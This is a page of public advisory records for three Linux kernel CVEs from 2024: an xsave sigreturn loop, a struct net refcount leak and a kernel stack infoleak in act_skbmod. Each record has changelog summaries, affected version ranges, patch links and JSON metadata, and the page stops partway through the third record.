x86/fpu: Stop relying on userspace for info to fault in xsave buffer

Summary

In the Linux kernel, the following vulnerability has been resolved: x86/fpu: Stop relying on userspace for info to fault in xsave buffer Before this change, the expected size of the user space buffer was taken from fx_sw->xstate_size. fx_sw->xstate_size can be changed from user-space, so it is possible construct a sigreturn frame where: * fx_sw->xstate_size is smaller than the size required by valid bits in fx_sw->xfeatures. * user-space unmaps parts of the sigrame fpu buffer so that not all of the buffer required by xrstor is accessible. In this case, xrstor tries to restore and accesses the unmapped area which results in a fault. But fault_in_readable succeeds because buf + fx_sw->xstate_size is within the still mapped area, so it goes back and tries xrstor again. It will spin in this loop forever. Instead, fault in the maximum size which can be touched by XRSTOR (taken from fpstate->user_size). [ dhansen: tweak subject / changelog ]

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/8bd3eee7720c14b59…
	https://git.kernel.org/stable/c/627339cccdc916679…
	https://git.kernel.org/stable/c/b2479ab426cef7ab7…
	https://git.kernel.org/stable/c/627e28cbb65564e55…
	https://git.kernel.org/stable/c/d877550eaf2dc9090…

Impacted products

Vendor

Product

Version

Linux

Affected: fcb3635f5018e53024c6be3c3213737f469f74ff , < 8bd3eee7720c14b59a206bd05b98d7586bccf99a (git)
Affected: fcb3635f5018e53024c6be3c3213737f469f74ff , < 627339cccdc9166792ecf96bc3c9f711a60ce996 (git)
Affected: fcb3635f5018e53024c6be3c3213737f469f74ff , < b2479ab426cef7ab79a13005650eff956223ced2 (git)
Affected: fcb3635f5018e53024c6be3c3213737f469f74ff , < 627e28cbb65564e55008315d9e02fbb90478beda (git)
Affected: fcb3635f5018e53024c6be3c3213737f469f74ff , < d877550eaf2dc9090d782864c96939397a3c6835 (git)

Linux

Affected: 5.14
Unaffected: 0 , < 5.14 (semver)
Unaffected: 5.15.150 , ≤ 5.15.* (semver)
Unaffected: 6.1.79 , ≤ 6.1.* (semver)
Unaffected: 6.6.18 , ≤ 6.6.* (semver)
Unaffected: 6.7.6 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26603",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-03-05T22:13:53.146807Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:48:37.905Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T18:29:51.152Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8bd3eee7720c14b59a206bd05b98d7586bccf99a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/627339cccdc9166792ecf96bc3c9f711a60ce996"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b2479ab426cef7ab79a13005650eff956223ced2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/627e28cbb65564e55008315d9e02fbb90478beda"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d877550eaf2dc9090d782864c96939397a3c6835"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZOU3745CWCDZ7EMKMXB2OEEIB5Q3IWM/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/x86/kernel/fpu/signal.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "8bd3eee7720c14b59a206bd05b98d7586bccf99a",
              "status": "affected",
              "version": "fcb3635f5018e53024c6be3c3213737f469f74ff",
              "versionType": "git"
            },
            {
              "lessThan": "627339cccdc9166792ecf96bc3c9f711a60ce996",
              "status": "affected",
              "version": "fcb3635f5018e53024c6be3c3213737f469f74ff",
              "versionType": "git"
            },
            {
              "lessThan": "b2479ab426cef7ab79a13005650eff956223ced2",
              "status": "affected",
              "version": "fcb3635f5018e53024c6be3c3213737f469f74ff",
              "versionType": "git"
            },
            {
              "lessThan": "627e28cbb65564e55008315d9e02fbb90478beda",
              "status": "affected",
              "version": "fcb3635f5018e53024c6be3c3213737f469f74ff",
              "versionType": "git"
            },
            {
              "lessThan": "d877550eaf2dc9090d782864c96939397a3c6835",
              "status": "affected",
              "version": "fcb3635f5018e53024c6be3c3213737f469f74ff",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/x86/kernel/fpu/signal.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.14"
            },
            {
              "lessThan": "5.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.150",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.79",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.18",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.150",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.79",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.18",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.6",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/fpu: Stop relying on userspace for info to fault in xsave buffer\n\nBefore this change, the expected size of the user space buffer was\ntaken from fx_sw-\u003exstate_size. fx_sw-\u003exstate_size can be changed\nfrom user-space, so it is possible construct a sigreturn frame where:\n\n * fx_sw-\u003exstate_size is smaller than the size required by valid bits in\n   fx_sw-\u003exfeatures.\n * user-space unmaps parts of the sigrame fpu buffer so that not all of\n   the buffer required by xrstor is accessible.\n\nIn this case, xrstor tries to restore and accesses the unmapped area\nwhich results in a fault. But fault_in_readable succeeds because buf +\nfx_sw-\u003exstate_size is within the still mapped area, so it goes back and\ntries xrstor again. It will spin in this loop forever.\n\nInstead, fault in the maximum size which can be touched by XRSTOR (taken\nfrom fpstate-\u003euser_size).\n\n[ dhansen: tweak subject / changelog ]"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:52:07.613Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/8bd3eee7720c14b59a206bd05b98d7586bccf99a"
        },
        {
          "url": "https://git.kernel.org/stable/c/627339cccdc9166792ecf96bc3c9f711a60ce996"
        },
        {
          "url": "https://git.kernel.org/stable/c/b2479ab426cef7ab79a13005650eff956223ced2"
        },
        {
          "url": "https://git.kernel.org/stable/c/627e28cbb65564e55008315d9e02fbb90478beda"
        },
        {
          "url": "https://git.kernel.org/stable/c/d877550eaf2dc9090d782864c96939397a3c6835"
        }
      ],
      "title": "x86/fpu: Stop relying on userspace for info to fault in xsave buffer",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26603",
    "datePublished": "2024-02-24T14:56:57.628Z",
    "dateReserved": "2024-02-19T14:20:24.129Z",
    "dateUpdated": "2025-11-04T18:29:51.152Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-27417 (GCVE-0-2024-27417)

Vulnerability from cvelistv5 – Published: 2024-05-17 11:51 – Updated: 2025-05-04 09:04

Title

ipv6: fix potential "struct net" leak in inet6_rtm_getaddr()

Summary

In the Linux kernel, the following vulnerability has been resolved: ipv6: fix potential "struct net" leak in inet6_rtm_getaddr() It seems that if userspace provides a correct IFA_TARGET_NETNSID value but no IFA_ADDRESS and IFA_LOCAL attributes, inet6_rtm_getaddr() returns -EINVAL with an elevated "struct net" refcount.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/9d4ffb5b9d879a75e…
	https://git.kernel.org/stable/c/810fa7d5e5202fcfb…
	https://git.kernel.org/stable/c/8a54834c03c30e549…
	https://git.kernel.org/stable/c/1b0998fdd85776775…
	https://git.kernel.org/stable/c/44112bc5c74e64f28…
	https://git.kernel.org/stable/c/33a1b6bfef6def206…
	https://git.kernel.org/stable/c/10bfd453da64a057b…

Impacted products

Vendor

Product

Version

Linux

Affected: 6ecf4c37eb3e89b0832c9616089a5cdca3747da7 , < 9d4ffb5b9d879a75e4f7460e8b10e756b4dfb132 (git)
Affected: 6ecf4c37eb3e89b0832c9616089a5cdca3747da7 , < 810fa7d5e5202fcfb22720304b755f1bdfd4c174 (git)
Affected: 6ecf4c37eb3e89b0832c9616089a5cdca3747da7 , < 8a54834c03c30e549c33d5da0975f3e1454ec906 (git)
Affected: 6ecf4c37eb3e89b0832c9616089a5cdca3747da7 , < 1b0998fdd85776775d975d0024bca227597e836a (git)
Affected: 6ecf4c37eb3e89b0832c9616089a5cdca3747da7 , < 44112bc5c74e64f28f5a9127dc34066c7a09bd0f (git)
Affected: 6ecf4c37eb3e89b0832c9616089a5cdca3747da7 , < 33a1b6bfef6def2068c8703403759024ce17053e (git)
Affected: 6ecf4c37eb3e89b0832c9616089a5cdca3747da7 , < 10bfd453da64a057bcfd1a49fb6b271c48653cdb (git)

Linux

Affected: 4.20
Unaffected: 0 , < 4.20 (semver)
Unaffected: 5.4.271 , ≤ 5.4.* (semver)
Unaffected: 5.10.212 , ≤ 5.10.* (semver)
Unaffected: 5.15.151 , ≤ 5.15.* (semver)
Unaffected: 6.1.81 , ≤ 6.1.* (semver)
Unaffected: 6.6.21 , ≤ 6.6.* (semver)
Unaffected: 6.7.9 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27417",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-24T14:19:39.323921Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:47:02.660Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:34:52.216Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9d4ffb5b9d879a75e4f7460e8b10e756b4dfb132"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/810fa7d5e5202fcfb22720304b755f1bdfd4c174"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8a54834c03c30e549c33d5da0975f3e1454ec906"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1b0998fdd85776775d975d0024bca227597e836a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/44112bc5c74e64f28f5a9127dc34066c7a09bd0f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/33a1b6bfef6def2068c8703403759024ce17053e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/10bfd453da64a057bcfd1a49fb6b271c48653cdb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/addrconf.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "9d4ffb5b9d879a75e4f7460e8b10e756b4dfb132",
              "status": "affected",
              "version": "6ecf4c37eb3e89b0832c9616089a5cdca3747da7",
              "versionType": "git"
            },
            {
              "lessThan": "810fa7d5e5202fcfb22720304b755f1bdfd4c174",
              "status": "affected",
              "version": "6ecf4c37eb3e89b0832c9616089a5cdca3747da7",
              "versionType": "git"
            },
            {
              "lessThan": "8a54834c03c30e549c33d5da0975f3e1454ec906",
              "status": "affected",
              "version": "6ecf4c37eb3e89b0832c9616089a5cdca3747da7",
              "versionType": "git"
            },
            {
              "lessThan": "1b0998fdd85776775d975d0024bca227597e836a",
              "status": "affected",
              "version": "6ecf4c37eb3e89b0832c9616089a5cdca3747da7",
              "versionType": "git"
            },
            {
              "lessThan": "44112bc5c74e64f28f5a9127dc34066c7a09bd0f",
              "status": "affected",
              "version": "6ecf4c37eb3e89b0832c9616089a5cdca3747da7",
              "versionType": "git"
            },
            {
              "lessThan": "33a1b6bfef6def2068c8703403759024ce17053e",
              "status": "affected",
              "version": "6ecf4c37eb3e89b0832c9616089a5cdca3747da7",
              "versionType": "git"
            },
            {
              "lessThan": "10bfd453da64a057bcfd1a49fb6b271c48653cdb",
              "status": "affected",
              "version": "6ecf4c37eb3e89b0832c9616089a5cdca3747da7",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/addrconf.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.20"
            },
            {
              "lessThan": "4.20",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.271",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.212",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.151",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.81",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.21",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.271",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.212",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.151",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.81",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.21",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.9",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix potential \"struct net\" leak in inet6_rtm_getaddr()\n\nIt seems that if userspace provides a correct IFA_TARGET_NETNSID value\nbut no IFA_ADDRESS and IFA_LOCAL attributes, inet6_rtm_getaddr()\nreturns -EINVAL with an elevated \"struct net\" refcount."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:04:42.491Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/9d4ffb5b9d879a75e4f7460e8b10e756b4dfb132"
        },
        {
          "url": "https://git.kernel.org/stable/c/810fa7d5e5202fcfb22720304b755f1bdfd4c174"
        },
        {
          "url": "https://git.kernel.org/stable/c/8a54834c03c30e549c33d5da0975f3e1454ec906"
        },
        {
          "url": "https://git.kernel.org/stable/c/1b0998fdd85776775d975d0024bca227597e836a"
        },
        {
          "url": "https://git.kernel.org/stable/c/44112bc5c74e64f28f5a9127dc34066c7a09bd0f"
        },
        {
          "url": "https://git.kernel.org/stable/c/33a1b6bfef6def2068c8703403759024ce17053e"
        },
        {
          "url": "https://git.kernel.org/stable/c/10bfd453da64a057bcfd1a49fb6b271c48653cdb"
        }
      ],
      "title": "ipv6: fix potential \"struct net\" leak in inet6_rtm_getaddr()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27417",
    "datePublished": "2024-05-17T11:51:07.803Z",
    "dateReserved": "2024-02-25T13:47:42.683Z",
    "dateUpdated": "2025-05-04T09:04:42.491Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35893 (GCVE-0-2024-35893)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:34 – Updated: 2025-05-04 09:07

Title

net/sched: act_skbmod: prevent kernel-infoleak

Summary

In the Linux kernel, the following vulnerability has been resolved: net/sched: act_skbmod: prevent kernel-infoleak syzbot found that tcf_skbmod_dump() was copying four bytes from kernel stack to user space [1]. The issue here is that 'struct tc_skbmod' has a four bytes hole. We need to clear the structure before filling fields. [1] BUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline] BUG: KMSAN: kernel-infoleak in copy_to_user_iter lib/iov_iter.c:24 [inline] BUG: KMSAN: kernel-infoleak in iterate_ubuf include/linux/iov_iter.h:29 [inline] BUG: KMSAN: kernel-infoleak in iterate_and_advance2 include/linux/iov_iter.h:245 [inline] BUG: KMSAN: kernel-infoleak in iterate_and_advance include/linux/iov_iter.h:271 [inline] BUG: KMSAN: kernel-infoleak in _copy_to_iter+0x366/0x2520 lib/iov_iter.c:185 instrument_copy_to_user include/linux/instrumented.h:114 [inline] copy_to_user_iter lib/iov_iter.c:24 [inline] iterate_ubuf include/linux/iov_iter.h:29 [inline] iterate_and_advance2 include/linux/iov_iter.h:245 [inline] iterate_and_advance include/linux/iov_iter.h:271 [inline] _copy_to_iter+0x366/0x2520 lib/iov_iter.c:185 copy_to_iter include/linux/uio.h:196 [inline] simple_copy_to_iter net/core/datagram.c:532 [inline] __skb_datagram_iter+0x185/0x1000 net/core/datagram.c:420 skb_copy_datagram_iter+0x5c/0x200 net/core/datagram.c:546 skb_copy_datagram_msg include/linux/skbuff.h:4050 [inline] netlink_recvmsg+0x432/0x1610 net/netlink/af_netlink.c:1962 sock_recvmsg_nosec net/socket.c:1046 [inline] sock_recvmsg+0x2c4/0x340 net/socket.c:1068 __sys_recvfrom+0x35a/0x5f0 net/socket.c:2242 __do_sys_recvfrom net/socket.c:2260 [inline] __se_sys_recvfrom net/socket.c:2256 [inline] __x64_sys_recvfrom+0x126/0x1d0 net/socket.c:2256 do_syscall_64+0xd5/0x1f0 entry_SYSCALL_64_after_hwframe+0x6d/0x75 Uninit was stored to memory at: pskb_expand_head+0x30f/0x19d0 net/core/skbuff.c:2253 netlink_trim+0x2c2/0x330 net/netlink/af_netlink.c:1317 netlink_unicast+0x9f/0x1260 net/netlink/af_netlink.c:1351 nlmsg_unicast include/net/netlink.h:1144 [inline] nlmsg_notify+0x21d/0x2f0 net/netlink/af_netlink.c:2610 rtnetlink_send+0x73/0x90 net/core/rtnetlink.c:741 rtnetlink_maybe_send include/linux/rtnetlink.h:17 [inline] tcf_add_notify net/sched/act_api.c:2048 [inline] tcf_action_add net/sched/act_api.c:2071 [inline] tc_ctl_action+0x146e/0x19d0 net/sched/act_api.c:2119 rtnetlink_rcv_msg+0x1737/0x1900 net/core/rtnetlink.c:6595 netlink_rcv_skb+0x375/0x650 net/netlink/af_netlink.c:2559 rtnetlink_rcv+0x34/0x40 net/core/rtnetlink.c:6613 netlink_unicast_kernel net/netlink/af_netlink.c:1335 [inline] netlink_unicast+0xf4c/0x1260 net/netlink/af_netlink.c:1361 netlink_sendmsg+0x10df/0x11f0 net/netlink/af_netlink.c:1905 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg+0x30f/0x380 net/socket.c:745 ____sys_sendmsg+0x877/0xb60 net/socket.c:2584 ___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638 __sys_sendmsg net/socket.c:2667 [inline] __do_sys_sendmsg net/socket.c:2676 [inline] __se_sys_sendmsg net/socket.c:2674 [inline] __x64_sys_sendmsg+0x307/0x4a0 net/socket.c:2674 do_syscall_64+0xd5/0x1f0 entry_SYSCALL_64_after_hwframe+0x6d/0x75 Uninit was stored to memory at: __nla_put lib/nlattr.c:1041 [inline] nla_put+0x1c6/0x230 lib/nlattr.c:1099 tcf_skbmod_dump+0x23f/0xc20 net/sched/act_skbmod.c:256 tcf_action_dump_old net/sched/act_api.c:1191 [inline] tcf_action_dump_1+0x85e/0x970 net/sched/act_api.c:1227 tcf_action_dump+0x1fd/0x460 net/sched/act_api.c:1251 tca_get_fill+0x519/0x7a0 net/sched/act_api.c:1628 tcf_add_notify_msg net/sched/act_api.c:2023 [inline] tcf_add_notify net/sched/act_api.c:2042 [inline] tcf_action_add net/sched/act_api.c:2071 [inline] tc_ctl_action+0x1365/0x19d0 net/sched/act_api.c:2119 rtnetlink_rcv_msg+0x1737/0x1900 net/core/rtnetlink.c:6595 netlink_rcv_skb+0x375/0x650 net/netlink/af_netli ---truncated---

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f190a4aa03cbd518b…
	https://git.kernel.org/stable/c/f356eb2fb567e0931…
	https://git.kernel.org/stable/c/5e45dc4408857305f…
	https://git.kernel.org/stable/c/a097fc199ab5f4b53…
	https://git.kernel.org/stable/c/55d3fe7b2b7bc354e…
	https://git.kernel.org/stable/c/729ad2ac2a2cdc9f4…
	https://git.kernel.org/stable/c/7bb2c7103d8c13b06…
	https://git.kernel.org/stable/c/d313eb8b77557a6d5…

Impacted products

Vendor

Product

Version

Linux

Affected: 86da71b57383d40993cb90baafb3735cffe5d800 , < f190a4aa03cbd518bd9c62a66e1233984f5fd2ec (git)
Affected: 86da71b57383d40993cb90baafb3735cffe5d800 , < f356eb2fb567e0931143ac1769ac802d3b3e2077 (git)
Affected: 86da71b57383d40993cb90baafb3735cffe5d800 , < 5e45dc4408857305f4685abfd7a528a1e58b51b5 (git)
Affected: 86da71b57383d40993cb90baafb3735cffe5d800 , < a097fc199ab5f4b5392c5144034c0d2148b55a14 (git)
Affected: 86da71b57383d40993cb90baafb3735cffe5d800 , < 55d3fe7b2b7bc354e7cbc1f7b8f98a29ccd5a366 (git)
Affected: 86da71b57383d40993cb90baafb3735cffe5d800 , < 729ad2ac2a2cdc9f4a4bdfd40bfd276e6bc33924 (git)
Affected: 86da71b57383d40993cb90baafb3735cffe5d800 , < 7bb2c7103d8c13b06a57bf997b8cdbe93cd7283c (git)
Affected: 86da71b57383d40993cb90baafb3735cffe5d800 , < d313eb8b77557a6d5855f42d2234bd592c7b50dd (git)

Linux

Affected: 4.9
Unaffected: 0 , < 4.9 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.85 , ≤ 6.1.* (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35893",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-23T19:31:02.298124Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:34.282Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.968Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f190a4aa03cbd518bd9c62a66e1233984f5fd2ec"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f356eb2fb567e0931143ac1769ac802d3b3e2077"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5e45dc4408857305f4685abfd7a528a1e58b51b5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a097fc199ab5f4b5392c5144034c0d2148b55a14"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/55d3fe7b2b7bc354e7cbc1f7b8f98a29ccd5a366"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/729ad2ac2a2cdc9f4a4bdfd40bfd276e6bc33924"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7bb2c7103d8c13b06a57bf997b8cdbe93cd7283c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d313eb8b77557a6d5855f42d2234bd592c7b50dd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/sched/act_skbmod.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f190a4aa03cbd518bd9c62a66e1233984f5fd2ec",
              "status": "affected",
              "version": "86da71b57383d40993cb90baafb3735cffe5d800",
              "versionType": "git"
            },
            {
